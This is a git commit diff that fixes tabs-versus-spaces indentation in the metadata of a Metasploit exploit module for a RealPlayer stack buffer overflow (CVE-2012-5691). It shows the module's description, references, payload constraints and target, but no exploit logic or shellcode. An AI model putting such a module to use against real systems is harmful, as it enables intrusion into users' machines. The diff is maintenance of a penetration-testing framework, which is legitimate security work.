Fix weird tabs vs spaces prob

unstable
sinn3r 2012-12-26 11:14:48 -06:00
parent e895ccb6b1
commit 0b2ea3e55e
1 changed files with 10 additions and 10 deletions

View File

@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'RealPlayer File Handling Buffer Overflow', 'Name' => 'RealPlayer File Handling Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.
The vulnerability exists in the handling of real media files, due to the insecure The vulnerability exists in the handling of real media files, due to the insecure
usage of the GetPrivateProfileString function to retrieve the URL property from an usage of the GetPrivateProfileString function to retrieve the URL property from an
@ -26,12 +26,12 @@ class Metasploit3 < Msf::Exploit::Remote
drag and drop or double click methods. It has been tested successfully on Windows drag and drop or double click methods. It has been tested successfully on Windows
XP SP3 with RealPlayer 15.0.5.109. XP SP3 with RealPlayer 15.0.5.109.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module 'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module
], ],
'References' => 'References' =>
[ [
[ 'CVE', '2012-5691' ], [ 'CVE', '2012-5691' ],
[ 'OSVDB', '88486' ], [ 'OSVDB', '88486' ],
@ -42,14 +42,14 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'ExitFunction' => 'process' 'ExitFunction' => 'process'
}, },
'Platform' => 'win', 'Platform' => 'win',
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00\x0a\x0d", 'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true, 'DisableNops' => true,
'Space' => 2000 'Space' => 2000
}, },
'Targets' => 'Targets' =>
[ [
[ 'Windows XP SP3 / Real Player 15.0.5.109', [ 'Windows XP SP3 / Real Player 15.0.5.109',
{ {
@ -59,9 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
} }
] ]
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => 'Dec 14 2012', 'DisclosureDate' => 'Dec 14 2012',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)